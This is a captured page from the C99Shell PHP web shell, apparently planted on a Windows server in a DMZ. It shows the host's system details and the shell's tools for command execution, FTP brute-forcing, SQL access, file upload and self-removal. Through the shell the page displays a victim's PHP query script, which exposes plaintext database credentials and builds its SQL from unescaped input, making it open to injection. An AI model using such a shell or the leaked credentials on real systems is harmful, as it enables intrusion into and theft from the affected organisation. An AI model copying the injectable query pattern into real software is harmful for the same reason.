!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\PEV\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     consulta.php (8.65 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
  
    // Configura la información de tu cuenta
    $dbhost='192.168.10.3';
    $dbusername='jaime';
    $dbuserpass='123';
    $dbname='pev';
    session_start(); 

 
    // Conexión a la base de datos
    $conexion = mysql_connect ($dbhost, $dbusername, $dbuserpass);
    mysql_select_db($dbname,$conexion) or die('Cannot select database');

    

    if (isset($_SESSION['s_username'])) {
    //echo "".$_SESSION['s_username']."";
    }else{
    echo "Tu no estas autentificado dirígete al administrador ";
    echo $_SESSION['s_username'];
    }
    ?> 
<?
//echo "$id...$emp_id...$registro...$radicado...$fecha_rad...$direccion_ele...$localidad...$ct...$fecha_ct";

    

if($consultar)
{

 $fecha_rad=$FECHAINICONSULTAPROCESO;
 $fecha_ct=$FECHAFINCONSULTAPROCESO;
if($id != ""){
$sql_id= " id = '$id'";
}
if($emp_id != ""){
$sqlemp_id= " and emp_id  = '$emp_id'";
}
if($registro != ""){
$sqlregistro= " and registro  = '$registro'";
}
if($radicado != ""){
$sqlradicado= " and radicado  = '$radicado'";
}
if($fecha_rad != ""){
$sqlfecha_rad= " and fecha_rad = '$fecha_rad'";
}
if($direccion_ele != ""){
$sqldireccion_ele= " and direccion_ele = '$direccion_ele'";
}
if($localidad != ""){
$sqllocalidad= " and localidad = '$localidad'";
}
if($ct != ""){
$sqlct= " and ct = '$ct'";
}
if($fecha_ct != ""){
$sqlfecha_ct= " and fecha_ct  = '$fecha_ct'";
}


//echo "$cod_id";                                                           '$fecha_ct','$fecha_con','$solicitud','$placa_veh','$num_caras','$dimensiones','$suj_req'
$sqlt = "select id,emp_id,registro,radicado,fecha_rad,direccion_ele,localidad,ct,fecha_ct,fecha_con,solicitud,placa_veh,num_caras,dimensiones,suj_req from concepto_tecnico where 1=1"; 
$sql=$sqlt.$sql_id.$sqlemp_id.$sqlregistro.$sqlradicado.$sqlfecha_rad.$sqldireccion_ele.$sqllocalidad.$sqlct.$sqlfecha_ct;

//echo "$sqlt";
//echo "$sql";    
    //cod_id='$cod_id'";
    $cursor = mysql_query( $sql, $conexion );
$num_rows = mysql_num_rows($cursor);
echo " <font color='#FFFFFF' face='Arial, Helvetica, sans-serif'><BR>                         $num_rows Registros encontrados \n <BR></font>"; 


?>   
<html>
<head>
<title>Consulta-Pev</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body background="imagenes/107.gif">

<TABLE borderColor=#ffffff cellSpacing=0 cellPadding=0 width=779 
      bgColor=#ebeef3 border=1 align="center">
  <TBODY>
    <TR> 
      <TD vAlign=center align=middle width=36 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Identificador</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=52 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Registro</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=76 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Radicado&nbsp;</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=56 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Solicitud</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=113 height=35><div align="center"><strong><FONT face=Arial 
            size=2> Direccion Elemento</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=63 height=35><strong><FONT face=Arial 
            size=2>Localidad</FONT></strong></TD>
      <TD vAlign=center align=middle width=76 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Empresa&nbsp;</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=63 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Pla-Veh</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=64 height=35><div align="center"><strong><FONT face=Arial 
            size=2>No. Caras</FONT></strong></div></TD>
      <TD vAlign=center align=middle width=47 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Dim</FONT></strong></div></TD>                        
      <TD vAlign=center align=middle width=62 height=35><div align="center"><strong><font size="2" face="Arial">C.T</font></strong></div></TD>
      <TD vAlign=center align=middle width=45 height=35><div align="center"><strong><FONT face=Arial 
            size=2>Suj. a Req</FONT></strong></div></TD>
    </TR>
</TABLE>    

<? 
  
  while( $row = mysql_fetch_array( $cursor ) ){
    $id = $row["id"];              
    $emp_id = $row["emp_id"];
    $registro = $row["registro"];      
    $radicado = $row["radicado"];              
    $fecha_rad = $row["fecha_rad"];                              
    $direccion_ele = $row["direccion_ele"];                                  
    $localidad = $row["localidad"];                              
    $ct  = $row["ct"];                              
    $fecha_ct = $row["fecha_ct"];                            
    $fecha_con = $row["fecha_con"]; 
    $solicitud = $row["solicitud"]; 
    $placa_veh = $row["placa_veh"]; 
    $num_caras = $row["num_caras"]; 
    $dimensiones = $row["dimensiones"]; 
    $suj_req = $row["suj_req"]; 

    
    if($registro == ""){
    $registro = "&nbsp";
    }
     if($radicado == ""){
     $radicado = "&nbsp";
     }
     if($fecha_rad == ""){
     $fecha_rad = "&nbsp";
     }
     if($direccion_ele == ""){
     $direccion_ele = "&nbsp";
     }
     if($localidad == ""){
     $localidad = "&nbsp";
     }
     if($emp_id == ""){
     $emp_id = "&nbsp";
     }
     if($ct == ""){
     $ct = "&nbsp";
     }
     if($fecha_ct == ""){
     $registro = "&nbsp";
     }
     
    
//echo "<h3> ..hola..$cod_id  ......$cod_inventario...$referencia...$marca...$modelo...$color...$tipo...$nom_maq...$potencia...$no_motor...$combustible...$tipo_f...$estado...$tipo_imp...$nom_imp...$tip_suelo...$ancho...$peso...$caracteristicas...$usuario...$imagen...</h3> "; 
?>
<TABLE borderColor=#ffffff cellSpacing=0 cellPadding=0 width=779 border=1 align="center">
  <TBODY>
    
    <TR> 
      
      <TD vAlign=center align=middle width=80 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$id"; ?></FONT></div></TD>
      <TD vAlign=center align=middle width=52 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$registro"; ?>&nbsp;&nbsp;&nbsp; <img src="imagenes/calend.gif" alt="Fecha <? echo"$fecha_con"; ?>" width="17" height="15">&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=72 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$radicado "; ?>&nbsp;<img src="imagenes/fecha.gif" alt="Fecha <? echo"$fecha_rad"; ?>" width="10" height="11">&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=56 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$solicitud"; ?>&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=104 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$direccion_ele"; ?>&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=63 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$localidad"; ?></FONT></div></TD>
      <TD vAlign=center align=middle width=72 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? $sql= "select nombre_emp from empresa where id = '$emp_id'"; 
                      $res=mysql_query($sql,$conexion);
                    while ( $myrow=mysql_fetch_array($res)){
                      $nombre_emp=$myrow["nombre_emp"];
                      }
            
            echo"$nombre_emp"; ?>&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=56 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$placa_veh"; ?>&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=58 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$num_caras"; ?>&nbsp;</FONT></div></TD>
      <TD vAlign=center align=middle width=41 height=35><div align="left"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$dimensiones"; ?>&nbsp;</FONT></div></TD>                        
      <TD vAlign=center align=middle width=55 height=35 bgcolor="#FFFFFF"><div align="center"><FONT face=Arial 
            size=2 color="#FFFFFF"><a href="dla.php?id=<? echo"$id"; ?>&ct_id=<? echo"$ct"; ?>&nombre_emp=<? echo"$nombre_emp"; ?>&localidad=<? echo"$localidad"; ?>"><? echo"$ct "; ?></a><img src="imagenes/cargando11.gif" alt="Fecha <? echo"$fecha_ct"; ?>" width="10" height="11"></FONT></div></TD>
      <TD vAlign=center align=middle width=44 height=35><div align="center"><FONT face=Arial 
            size=2 color="#FFFFFF"><? echo"$suj_req"; ?>&nbsp;</FONT></div></TD>
    </TR>
 <? } } ?>
  </TBODY>

</TABLE>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--